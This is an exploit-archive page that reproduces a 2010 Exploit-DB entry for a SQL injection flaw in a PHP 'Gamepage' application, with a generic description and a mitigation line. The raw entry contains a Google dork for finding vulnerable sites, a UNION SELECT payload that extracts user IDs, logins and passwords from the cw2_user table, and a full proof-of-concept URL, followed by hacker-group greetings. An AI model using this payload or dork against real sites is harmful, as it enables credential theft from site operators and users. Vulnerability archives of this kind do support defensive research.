header-logo
Suggest Exploit
vendor:
N/A
by:
v4lc0m87
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

PHP Gamepage SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. The malicious query can be sent through the vulnerable parameter of the application. The malicious query can be used to extract sensitive information from the database such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

*************************************************************************
 ,                               
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                   
*************************************************************************
[V] PHP Gamepage SQL Injection Vulnerability

			--==[ Author ]==--
[+] Author	: v4lc0m87
[+] Contact	: valcom87[at]gmail[dot]com
[+] Group	: INDONESIAN CYBER
[+] Site	: http://indonesian-cyber.org/
[+] Date	: May, 17-2010 [INDONESIA]

*************************************************************************
			--==[ Details ]==--

[+] Vulnerable	: SQL Injection
[+] Google Dork	: inurl:index.php?title=gamepage

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
    

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG

[V] thx to:
SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk)
blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!

Navigation

Suggest Exploit

Services By CQR